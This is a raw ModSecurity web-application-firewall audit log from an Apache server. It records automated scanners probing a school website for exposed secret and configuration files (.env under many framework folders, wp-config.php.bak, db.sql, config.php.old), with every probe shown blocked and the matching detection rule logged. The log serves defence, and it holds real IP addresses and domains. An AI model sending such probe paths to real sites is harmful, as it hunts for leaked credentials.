Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2977765e-Z-- --904dd42e-A-- [18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGIgAAAFY 103.236.140.4 59810 103.236.140.4 8181 --904dd42e-B-- GET /symfony/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --904dd42e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --904dd42e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987155477 758 (- - -) Stopwatch2: 1744959987155477 758; combined=293, p1=260, p2=0, p3=0, p4=0, p5=32, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904dd42e-Z-- --a0a4c337-A-- [18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGJAAAAEQ 103.236.140.4 59814 103.236.140.4 8181 --a0a4c337-B-- GET /django/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --a0a4c337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0a4c337-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987398315 802 (- - -) Stopwatch2: 1744959987398315 802; combined=299, p1=262, p2=0, p3=0, p4=0, p5=36, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0a4c337-Z-- --3402f619-A-- [18/Apr/2025:14:06:27 +0700] aAH58zpR4B6O-aqWibMrbgAAAI4 103.236.140.4 59820 103.236.140.4 8181 --3402f619-B-- GET /flask/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --3402f619-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3402f619-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987641132 898 (- - -) Stopwatch2: 1744959987641132 898; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3402f619-Z-- --c9be5304-A-- [18/Apr/2025:14:06:27 +0700] aAH58zlhhbF_BYhFYTVGJgAAAEg 103.236.140.4 59822 103.236.140.4 8181 --c9be5304-B-- GET /next/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --c9be5304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9be5304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959987883915 846 (- - -) Stopwatch2: 1744959987883915 846; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9be5304-Z-- --de89f96e-A-- [18/Apr/2025:14:06:28 +0700] aAH59Bk6uTiIdxrJEEQXkAAAAM0 103.236.140.4 59834 103.236.140.4 8181 --de89f96e-B-- GET /nuxt/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --de89f96e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de89f96e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959988126721 753 (- - -) Stopwatch2: 1744959988126721 753; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de89f96e-Z-- --1395e674-A-- [18/Apr/2025:14:06:28 +0700] aAH59Bk6uTiIdxrJEEQXkQAAAMc 103.236.140.4 59836 103.236.140.4 8181 --1395e674-B-- GET /react/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --1395e674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1395e674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744959988369579 809 (- - -) Stopwatch2: 1744959988369579 809; combined=299, p1=264, p2=0, p3=0, p4=0, p5=34, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1395e674-Z-- --04aec923-A-- [18/Apr/2025:14:06:28 +0700] aAH59Fyj-eUTITfvHEWQGgAAAA8 103.236.140.4 59838 103.236.140.4 8181 --04aec923-B-- GET /db.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --04aec923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04aec923-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744959988614265 2629 (- - -) Stopwatch2: 1744959988614265 2629; combined=941, p1=407, p2=498, p3=0, p4=0, p5=36, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04aec923-Z-- --664ec06b-A-- [18/Apr/2025:14:06:41 +0700] aAH6ATlhhbF_BYhFYTVGOAAAAEM 103.236.140.4 59974 103.236.140.4 8181 --664ec06b-B-- GET /config.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --664ec06b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --664ec06b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744960001234111 3254 (- - -) Stopwatch2: 1744960001234111 3254; combined=959, p1=482, p2=444, p3=0, p4=0, p5=33, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --664ec06b-Z-- --74b84072-A-- [18/Apr/2025:14:06:43 +0700] aAH6AzlhhbF_BYhFYTVGOwAAAE4 103.236.140.4 60002 103.236.140.4 8181 --74b84072-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --74b84072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74b84072-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960003881264 841 (- - -) Stopwatch2: 1744960003881264 841; combined=337, p1=304, p2=0, p3=0, p4=0, p5=33, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74b84072-Z-- --92752067-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPAAAAEE 103.236.140.4 60008 103.236.140.4 8181 --92752067-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --92752067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92752067-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004124214 764 (- - -) Stopwatch2: 1744960004124214 764; combined=271, p1=237, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92752067-Z-- --321ae41e-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPgAAAFE 103.236.140.4 60014 103.236.140.4 8181 --321ae41e-B-- GET /web.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --321ae41e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --321ae41e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004367045 823 (- - -) Stopwatch2: 1744960004367045 823; combined=320, p1=284, p2=0, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --321ae41e-Z-- --4a22d223-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGPwAAAFU 103.236.140.4 60016 103.236.140.4 8181 --4a22d223-B-- GET /cp/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --4a22d223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a22d223-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004609864 727 (- - -) Stopwatch2: 1744960004609864 727; combined=309, p1=278, p2=0, p3=0, p4=0, p5=31, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a22d223-Z-- --d1559874-A-- [18/Apr/2025:14:06:44 +0700] aAH6BDlhhbF_BYhFYTVGQAAAAEY 103.236.140.4 60018 103.236.140.4 8181 --d1559874-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d1559874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1559874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960004852577 643 (- - -) Stopwatch2: 1744960004852577 643; combined=274, p1=247, p2=0, p3=0, p4=0, p5=27, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1559874-Z-- --31753901-A-- [18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGQgAAAFA 103.236.140.4 60024 103.236.140.4 8181 --31753901-B-- GET /conf/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --31753901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31753901-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960005095307 814 (- - -) Stopwatch2: 1744960005095307 814; combined=306, p1=270, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31753901-Z-- --58742843-A-- [18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGQwAAAEc 103.236.140.4 60026 103.236.140.4 8181 --58742843-B-- GET /server/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --58742843-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58742843-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960005338021 713 (- - -) Stopwatch2: 1744960005338021 713; combined=314, p1=283, p2=0, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58742843-Z-- --12936443-A-- [18/Apr/2025:14:06:45 +0700] aAH6BTlhhbF_BYhFYTVGRQAAAEw 103.236.140.4 60032 103.236.140.4 8181 --12936443-B-- GET /crm/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.148.156.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.148.156.201 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --12936443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12936443-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744960005580856 873 (- - -) Stopwatch2: 1744960005580856 873; combined=393, p1=359, p2=0, p3=0, p4=0, p5=34, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12936443-Z-- --8b46db00-A-- [18/Apr/2025:14:35:48 +0700] aAIA1Fyj-eUTITfvHEWSvwAAAAM 103.236.140.4 40126 103.236.140.4 8181 --8b46db00-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.42.174 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.42.174 X-Forwarded-Proto: https Connection: close Content-Length: 37 content-type: application/dns-message accept: application/dns-message user-agent: Chrome --8b46db00-C-- itest meshtrustwork --8b46db00-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b46db00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744961748407070 4425 (- - -) Stopwatch2: 1744961748407070 4425; combined=2825, p1=638, p2=2091, p3=29, p4=33, p5=33, sr=128, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b46db00-Z-- --e0db6d58-A-- [18/Apr/2025:14:39:11 +0700] aAIBn1yj-eUTITfvHEWTFQAAABg 103.236.140.4 40908 103.236.140.4 8181 --e0db6d58-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e0db6d58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0db6d58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744961951015122 830 (- - -) Stopwatch2: 1744961951015122 830; combined=326, p1=293, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: 